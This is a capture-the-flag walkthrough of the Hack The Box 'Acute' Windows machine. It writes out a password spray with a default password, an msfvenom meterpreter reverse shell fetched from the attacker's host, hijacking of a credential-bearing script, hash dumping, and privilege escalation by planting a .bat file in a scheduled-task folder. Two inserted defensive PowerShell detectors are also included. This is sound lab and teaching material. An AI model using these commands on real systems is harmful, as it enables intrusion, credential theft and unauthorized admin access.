Now this is a tough machine: painful, but interesting. Without wasting too much time, let's jump in.
We always start with an nmap scan.
nmap -p- --min-rate 10000 -oA nmap/allports -v IP
# Nmap 7.91 scan initiated Wed Feb 16 14:29:52 2022 as: nmap -p- --min-rate 10000 -oN nmap/full.tcp -v 10.10.11.145
Nmap scan report for 10.10.11.145
Host is up (0.27s latency).
Not shown: 65534 filtered ports
PORT STATE SERVICE
443/tcp open https
Read data files from: /usr/bin/../share/nmap
# Nmap done at Wed Feb 16 14:31:33 2022 -- 1 IP address (1 host up) scanned in 101.32 seconds
That is strange: just one open port, 443 (HTTPS).
nmap -sC -sV -oN nmap/normal.tcp -p 443 10.10.11.145
# Nmap 7.91 scan initiated Wed Feb 16 14:29:26 2022 as: nmap -sC -sV -oN nmap/normal.tcp -p 443 10.10.11.145
Nmap scan report for 10.10.11.145
Host is up (0.29s latency).
PORT STATE SERVICE VERSION
443/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
| ssl-cert: Subject: commonName=atsserver.acute.local
| Subject Alternative Name: DNS:atsserver.acute.local, DNS:atsserver
| Not valid before: 2022-01-06T06:34:58
|_Not valid after: 2030-01-04T06:34:58
|_ssl-date: 2022-02-16T16:29:37+00:00; +2h59m36s from scanner time.
| tls-alpn:
|_ http/1.1
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 2h59m35s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Feb 16 14:30:03 2022 -- 1 IP address (1 host up) scanned in 36.87 seconds
Now that is interesting. Let's add atsserver.acute.local 10.10.14.145 to /etc/hosts, then see what is running on the web page.
Let's look around the site for hints or anything else that can push our enumeration forward. The staff names on the page can be used to build a user list; it may come in handy.
Awallace
Chall
Edavies
Imonks
Jmorgan
Lhopkins
The New Starter Forms link looks interesting, so let's click it. It downloads a .doc file; let's open it and see what is inside. It seems to be a checklist, which is promising.
Arrange for the new starter to meet with other staff in the department as appropriate. This could include the Head of Department and/or other members of the appointee’s team. Complete the remote training.
Now that is cool. Clicking the remote training link took me to a staff web page, which is a Windows PowerShell Web Access portal. Nice.
Since we already know the default password for new staff, Password1!, let's try to get the computer name. Back to the doc file: let's check for anything hidden in its metadata with exiftool.
Now we have the computer name, so let's try that password with every username in the list we compiled.
I was able to get in as edavies. Now it is time to enumerate the system further and see what we can loot, so the best thing to do is to get a proper reverse shell back to our terminal.
┌──(muzec㉿Muzec-Security)-[~/Documents/HTB/10.10.11.145]
└─$ msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.14.52 LPORT=1337 -f exe > shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 200262 bytes
Final size of exe file: 206848 bytes
We use msfvenom to generate a payload file for a reverse shell. Now let's find a writable folder on the target. Found one, so let's transfer our payload.
Invoke-WebRequest "http://10.10.14.52:8000/shell.exe" -OutFile "shell.exe"
Start the listener before executing the payload, then click run to execute it on the target. Now that we have a meterpreter shell, let's use the screenshare command to see what is happening on the target's screen. We can confirm the stream in the browser.
We just need to create the same credential object and use Invoke-Command to execute commands as user imonks.
$passwd = ConvertTo-SecureString "W3_4R3_th3_f0rce." -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential ("acute\imonks", $passwd)
invoke-Command -computername atsserver -ConfigurationName dc_manage -ScriptBlock {whoami} -credential $cred
Boom, we can execute commands as imonks. Now let's enumerate more.
invoke-Command -computername atsserver -ConfigurationName dc_manage -ScriptBlock {ls /users} -credential $cred
We have more users to enumerate, so let's hit it.
invoke-Command -computername atsserver -ConfigurationName dc_manage -ScriptBlock {ls /users/imonks/desktop} -credential $cred
Boom, we have user.txt. There also seems to be a PowerShell script; let's cat it to see what is inside.
That script looks promising: it contains jmorgan's password in a credential object, so it should be possible to execute commands as jmorgan if we run it. What we need to do is edit the line Invoke-Command -ScriptBlock {Get-Volume} -ComputerName Acute-PC01 -Credential $creds, remove Get-Volume, and put the path to our reverse shell executable in its place.
Invoke-Command -computername ATSSERVER -ConfigurationName dc_manage -ScriptBlock{((Get-Content "c:\users\imonks\Desktop\wm.ps1" -Raw) -replace 'Get-Volume','cmd.exe /c c:\utils\rev.exe') | set-content -path c:\users\imonks\Desktop\wm.ps1} -credential $cred
Now we can execute it with Invoke-Command again.
invoke-Command -computername atsserver -ConfigurationName dc_manage -ScriptBlock {C:\Users\imonks\Desktop\wm.ps1} -credential $cred
Back to our listener: boom, we have a shell as jmorgan.
Cool, now let's check which local groups jmorgan is in. jmorgan is part of the Administrators group, so we can dump the hashes.
Now let's crack the administrator hash.
The issue is that when I try to use it for administrator it is a dead end, so let's try password reuse on each user we have no access to yet, using PowerShell just like the first time: set up the credential object and use Invoke-Command.
A flashback: if I remember right, we found some new users on ATSSERVER, so why not give it a try with those usernames.
$passwd = ConvertTo-SecureString "Password@123" -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential ("acute\awallace", $passwd)
invoke-Command -computername atsserver -ConfigurationName dc_manage -ScriptBlock {whoami} -credential $cred
Boom, it works for user awallace. More enumeration now.
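As an added example (not part of the original writeup), here is a PowerShell check a defender could run to spot the pattern the step above leaves behind: one source address failing logons for several different usernames in a short window. It assumes the failed logons are recorded as Security event ID 4625 on the target; the records below are constructed.

```powershell
# Added example, not from the original post. Flags a source address that fails
# logons for several distinct accounts within a short window: the shape that a
# single password tried across a user list leaves in the Security log.
# Assumption: failed logons are recorded as event ID 4625 on the target; in
# production build $Events from
#   Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4625 }
function Find-PasswordSpray {
    param(
        [Parameter(Mandatory)] [object[]] $Events,
        [int] $MinDistinctUsers = 3,
        [int] $WindowMinutes = 10
    )
    $failed = $Events | Where-Object { $_.Id -eq 4625 }
    foreach ($group in ($failed | Group-Object -Property IpAddress)) {
        $sorted = @($group.Group | Sort-Object -Property TimeCreated)
        $users  = @($sorted | ForEach-Object { $_.TargetUserName } | Sort-Object -Unique)
        $span   = $sorted[-1].TimeCreated - $sorted[0].TimeCreated
        if ($users.Count -ge $MinDistinctUsers -and $span.TotalMinutes -le $WindowMinutes) {
            [pscustomobject]@{
                Source        = $group.Name
                DistinctUsers = $users.Count
                Users         = ($users -join ', ')
                SpanMinutes   = [math]::Round($span.TotalMinutes, 1)
            }
        }
    }
}

# Constructed sample records: one host tries one password against four
# accounts within two minutes, plus one unrelated single failure from a
# constructed second address.
$t = Get-Date '2022-02-16 14:40:00'
$sample = @(
    [pscustomobject]@{ Id = 4625; TimeCreated = $t;                TargetUserName = 'awallace'; IpAddress = '10.10.14.52' }
    [pscustomobject]@{ Id = 4625; TimeCreated = $t.AddSeconds(30); TargetUserName = 'chall';    IpAddress = '10.10.14.52' }
    [pscustomobject]@{ Id = 4625; TimeCreated = $t.AddSeconds(60); TargetUserName = 'lhopkins'; IpAddress = '10.10.14.52' }
    [pscustomobject]@{ Id = 4625; TimeCreated = $t.AddSeconds(90); TargetUserName = 'jmorgan';  IpAddress = '10.10.14.52' }
    [pscustomobject]@{ Id = 4625; TimeCreated = $t.AddMinutes(3);  TargetUserName = 'edavies';  IpAddress = '10.10.11.200' }
)
# Only 10.10.14.52 is reported: four distinct users in 1.5 minutes
Find-PasswordSpray -Events $sample | Format-Table -AutoSize
```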
invoke-Command -computername atsserver -ConfigurationName dc_manage -ScriptBlock {ls /"program files"} -credential $cred
The keepmeon folder looks strange and interesting; let's check what is in it.
invoke-Command -computername atsserver -ConfigurationName dc_manage -ScriptBlock {ls /"program files"/keepmeon} -credential $cred
We have a .bat file; let's cat it to see what keepmeon.bat is doing.
invoke-Command -computername atsserver -ConfigurationName dc_manage -ScriptBlock {cat /"program files"/keepmeon/keepmeon.bat} -credential $cred
This looks like a job that runs every 5 minutes, just like a cron job in Linux; this one is probably a scheduled task set to run every 5 minutes, which is cool.
REM This is run every 5 minutes. For Lois use ONLY
@echo off
for /R %%x in (*.bat) do (
if not "%%x" == "%~0" call "%%x"
)
Let me break it down: any file ending in .bat inside the keepmeon folder will be run every 5 minutes, so it is possible to create a payload in .bat format that gives us access as lois.
Now back to the doc file we got first.
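From a defender's side, the root cause here is a folder that a privileged scheduled job executes scripts from being writable by a low-privileged account. As an added example (not code from the original writeup), this PowerShell audit lists every ACE on such a folder that grants create or modify rights to a principal outside an assumed trusted list; the path and the trusted list are placeholders.

```powershell
# Added example, not from the original writeup. Audits a folder that a
# privileged scheduled job executes scripts from and reports every ACE that
# lets a principal outside the trusted list create or modify files there.
# The path and the trusted-principal list are assumptions for this example.
function Get-UntrustedWriteAccess {
    param(
        [Parameter(Mandatory)] [string] $Path,
        [string[]] $Trusted = @(
            'NT AUTHORITY\SYSTEM',
            'BUILTIN\Administrators',
            'NT SERVICE\TrustedInstaller',
            'CREATOR OWNER'
        )
    )
    $fsr = [System.Security.AccessControl.FileSystemRights]
    # Any of these bits is enough to drop or alter a .bat in the folder
    $writeMask = [int]($fsr::CreateFiles -bor $fsr::AppendData -bor
                       $fsr::Write -bor $fsr::Modify -bor $fsr::FullControl)
    # Inherited ACEs may carry generic rights instead of specific bits
    $genericWrite = 0x40000000   # GENERIC_WRITE
    $genericAll   = 0x10000000   # GENERIC_ALL

    $acl = Get-Acl -Path $Path
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($Trusted -contains $ace.IdentityReference.Value) { continue }
        $rights   = [int]$ace.FileSystemRights
        $canWrite = (($rights -band $writeMask) -ne 0) -or
                    (($rights -band $genericWrite) -ne 0) -or
                    (($rights -band $genericAll) -ne 0)
        if ($canWrite) {
            [pscustomobject]@{
                Path      = $Path
                Principal = $ace.IdentityReference.Value
                Rights    = $ace.FileSystemRights
                Inherited = $ace.IsInherited
            }
        }
    }
}

# Every row is a principal who can plant a .bat that the "for /R ... call"
# loop in keepmeon.bat would run under the job owner's account.
Get-UntrustedWriteAccess -Path 'C:\Program Files\Keepmeon' | Format-Table -AutoSize
```

An empty result means only the trusted principals can write there; anything else should be fixed by tightening the ACL or by having the job call a fixed, admin-owned script instead of every .bat it finds.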
**Lois is the only authorized personnel to change Group Membership, Contact Lois to have this approved and changed if required. Only Lois can become site admin.**
Let's add user awallace to the site_admin group and wait 5 minutes to confirm it.
Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred -ScriptBlock {Set-Content -Path 'c:\program files\Keepmeon\admin.bat' -Value 'net group site_admin awallace /add /domain'}
Now we can confirm whether user awallace is part of the site_admin group.
invoke-Command -computername atsserver -ConfigurationName dc_manage -ScriptBlock {net group site_admin} -credential $cred
We are part of the site_admin group; time to get the root.txt flag.
invoke-Command -computername atsserver -ConfigurationName dc_manage -ScriptBlock {ls /users/administrator/desktop} -credential $cred
invoke-Command -computername atsserver -ConfigurationName dc_manage -ScriptBlock {cat /users/administrator/desktop/root.txt} -credential $cred
Ahhh, finally we are done.
Greetings from Muzec.